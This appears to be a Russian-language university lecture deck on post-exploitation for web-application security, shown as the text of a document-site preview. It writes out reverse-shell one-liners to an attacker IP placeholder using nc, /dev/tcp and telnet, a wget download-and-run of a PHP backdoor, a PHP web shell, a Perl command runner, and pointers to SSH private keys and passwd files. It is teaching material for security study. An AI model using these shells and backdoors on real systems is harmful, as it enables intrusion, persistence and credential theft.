Безопасность весна 2014 лекция 7

Preview:

Citation preview

Безопасность интернет-приложений

Лекция 7 «Пост-эксплуатация»

Жизнь после марса

2

- доступ на выполнение .- данные: хранение.- данные: перехват.- перманентный доступ.

Места раскопок

3

- конфигурация.- исходники.- доступы к окружению.- db.

Конфигурация

4

/etc/passwd

/etc/hosts hosts.allow hosts.deny

webserver: httpd.conf .htaccess passwd

webapp configs

Окружение

5

NFS:.showmount –e target.mount –o nolock –t nfs target:/path /local

rsync:.rsync rsync://target/

ftp:.ftp target

samba:.smbclient –L target .smbclient \\target\share <password>

http:.wget, curl, lynx, etc

netstat –anp|grep ESTABLISHED

DB

6

mysqldump.mysql –uroot –S /tmp/mysql.sock

доступ на выполнение

7

while ( true ); do read cmd; wget –O – http://target/vuln?$cmd; done

web-уязвимость, простейший случай:

доступ на выполнение

8

nc <attacker_ip> <port> -e /bin/bash

mknod backpipe p; nc <attacker_ip> <port> 0<backpipe |. /bin/bash 1>backpipe

/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1

mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe

wget -O /tmp/bd.php <url_to_malicious_file> && php -f /tmp/bd.php

telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>

Данные: перехват

9

- keyloggers.- patched ssh, patched pam-module.- tcpdump.- patched web

Перманентный доступ

10

- системный бэкдор.- аутентификационные данные.- web-бэкдор.- etc

Auth

11

ssh –i privkey user@target

/home/user/.ssh/id.dsa./home/user/.ssh/id.rsa

backdoor

12

- process.- cronjob.- patched binary.- kernel module

web

13

<?php passthru($_REQUEST['c']) ?>

....my @cmd = `$req`;.foreach my $line (@cmd) {. print $line . "<br/>";.}....

AddType application/x-httpd-php .txt